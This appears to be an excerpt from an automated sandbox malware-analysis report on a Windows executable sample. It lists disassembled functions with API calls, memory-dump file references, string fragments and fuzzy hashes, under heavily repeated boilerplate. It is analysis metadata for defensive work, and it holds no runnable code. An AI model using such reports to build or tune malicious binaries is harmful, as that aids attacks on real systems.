                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: 550748123659a34964c3edfdc6818248ee6223c2fc985f01e5edfecb57c9d602
                                                                                                                                                      • Instruction ID: 208619864822ded23b9f0fc6e8d017ad9afea93b209a8c31258b565a3838358e
                                                                                                                                                      • Opcode Fuzzy Hash: 550748123659a34964c3edfdc6818248ee6223c2fc985f01e5edfecb57c9d602
                                                                                                                                                      • Instruction Fuzzy Hash: 246133A1D08294DAF7218724DC457EB7A39DFD0710F1481FED44D66681D6BE0BC68B27
                                                                                                                                                      Function 0040BD60 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 195COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: 9ddb5a7f7316180acbc25141c48f4b95fb4f7d769d39293a7c0d0e919ba87399
                                                                                                                                                      • Instruction ID: fd5885023f4b358d4eac04baf7284476dbc9d60256054ac93b075ccfc545bb63
                                                                                                                                                      • Opcode Fuzzy Hash: 9ddb5a7f7316180acbc25141c48f4b95fb4f7d769d39293a7c0d0e919ba87399
                                                                                                                                                      • Instruction Fuzzy Hash: D7611491D08294DAF7218724DC457EB7A39DFD0710F1481FED44D6A681D6BE0BC68B27
                                                                                                                                                      Function 0040BFD1 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 194COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: cf732239f50026ec166b5f8a304eb691d086f306dfed2806414a5b96e8da4638
                                                                                                                                                      • Instruction ID: b91351a602d593e604c9a597045b4f32dd95b2873b3e86a3e59e99e712c295bb
                                                                                                                                                      • Opcode Fuzzy Hash: cf732239f50026ec166b5f8a304eb691d086f306dfed2806414a5b96e8da4638
                                                                                                                                                      • Instruction Fuzzy Hash: C76103A1D08294DAF7218724DC457EB7A39DFD0710F1481FED44D6A681E6BE0BC68B27
                                                                                                                                                      Function 0040C635 Relevance: 1.7, APIs: 1, Instructions: 188COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: 9a5b07d50968f5a5a33a42041e89df66e587ce4be2ee540ab80df64da2c54726
                                                                                                                                                      • Instruction ID: de8a4150e3e2cf68bf20060b1f27a299a51b9094292f0d72657fac800c709e29
                                                                                                                                                      • Opcode Fuzzy Hash: 9a5b07d50968f5a5a33a42041e89df66e587ce4be2ee540ab80df64da2c54726
                                                                                                                                                      • Instruction Fuzzy Hash: 085117B2D041149BF7208B25DC45BFB7B79EF80310F1542BAE84DA2680E23D5AC5CB66
                                                                                                                                                      Function 0040C0A9 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 176COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ?4:Z$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-178481897
                                                                                                                                                      • Opcode ID: 2d0078a4e1718066b6bd25370331ff6b2c29aae98de2e60b0c2fda70ab3628cd
                                                                                                                                                      • Instruction ID: 9e29478c6255eedc6371b7b31605b7cf1d6ab259d432597406e054186138c5f6
                                                                                                                                                      • Opcode Fuzzy Hash: 2d0078a4e1718066b6bd25370331ff6b2c29aae98de2e60b0c2fda70ab3628cd
                                                                                                                                                      • Instruction Fuzzy Hash: CA5167A1D082949AF7218724DC417EB7A39DF90710F1481FED44D67681E6BE0FC68B27
                                                                                                                                                      Function 00415744 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 75memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • HeapSetInformation.KERNEL32(?,00000001), ref: 00415749
                                                                                                                                                      • _fast_error_exit.LIBCMT ref: 004157A3
                                                                                                                                                        • Part of subcall function 004156FB: __FF_MSGBANNER.LIBCMT ref: 00415709
                                                                                                                                                        • Part of subcall function 004156FB: __NMSG_WRITE.LIBCMT ref: 00415711
                                                                                                                                                      • _fast_error_exit.LIBCMT ref: 004157B4
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 004157CD
                                                                                                                                                      • GetCommandLineW.KERNEL32(?,00000001), ref: 004157D3
                                                                                                                                                      • __wsetargv.LIBCMT ref: 004157E8
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 004157F3
                                                                                                                                                      • __wsetenvp.LIBCMT ref: 004157F9
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00415804
                                                                                                                                                      • __cinit.LIBCMT ref: 0041580C
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00415817
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __amsg_exit$_fast_error_exit$CommandHeapInformationLine__cinit__wsetargv__wsetenvp
                                                                                                                                                      • String ID: YSl$Yrh$W
                                                                                                                                                      • API String ID: 495375042-3553233420
                                                                                                                                                      • Opcode ID: 177d833bc692cd9b4f54a7efe97807f3b95ddf99724db6f4f477688eaf1752a8
                                                                                                                                                      • Instruction ID: 3ad2514ef2d4a8fb3d4db0986c40aef22871cecf875f56b9d18474f28f6ced5d
                                                                                                                                                      • Opcode Fuzzy Hash: 177d833bc692cd9b4f54a7efe97807f3b95ddf99724db6f4f477688eaf1752a8
                                                                                                                                                      • Instruction Fuzzy Hash: AD21D230A88714D6EB2477B29D877EE26746F40708F10402FFC25A91C2EFBC84C19A6E
                                                                                                                                                      Function 0040C166 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 136COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: 7ecc125851947807b28881be17fe346295ce7e30f9f6791f6214aa20b03f0186
                                                                                                                                                      • Instruction ID: 1fd2a57ec42fc069f9c9e6eb1f30a52e5e8cd407d5f5db1c86275cac6f09bb00
                                                                                                                                                      • Opcode Fuzzy Hash: 7ecc125851947807b28881be17fe346295ce7e30f9f6791f6214aa20b03f0186
                                                                                                                                                      • Instruction Fuzzy Hash: 30415AE2C08184DEF7218224DC457EB7B79DBD1714F1881FED44D25A82D67E1BCA8A27
                                                                                                                                                      Function 0040CCC2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID: P
                                                                                                                                                      • API String ID: 621844428-3110715001
                                                                                                                                                      • Opcode ID: dfd3e73e43fb0de9aa0ebd2d874d64beb031c13ca9690b4ffd0a0cb83bbd051a
                                                                                                                                                      • Instruction ID: fd9b133df32bb7292ee0a0534e24d5bbfc4e221d87805b7341f3c622169aad27
                                                                                                                                                      • Opcode Fuzzy Hash: dfd3e73e43fb0de9aa0ebd2d874d64beb031c13ca9690b4ffd0a0cb83bbd051a
                                                                                                                                                      • Instruction Fuzzy Hash: 24E0D83190C2559EF3A00B24DC9C79FBF7CDB42714F5000B7D50AD60C1CB7D4A869912
                                                                                                                                                      Function 0040C3BD Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4392ff6410eed9a53257134b9d64f32b32a4d3fbdded8eed35061b62c0e99df3
                                                                                                                                                      • Instruction ID: f56dd8d996ad5540ce26c9d5e4b3da27ddda79bf98cd93287bba5281d932ca75
                                                                                                                                                      • Opcode Fuzzy Hash: 4392ff6410eed9a53257134b9d64f32b32a4d3fbdded8eed35061b62c0e99df3
                                                                                                                                                      • Instruction Fuzzy Hash: BA5128B2D041249BF7208B28DC557FBBB79FF80314F1541BAD84DA2280E2396EC5CB56
                                                                                                                                                      Function 0040C552 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
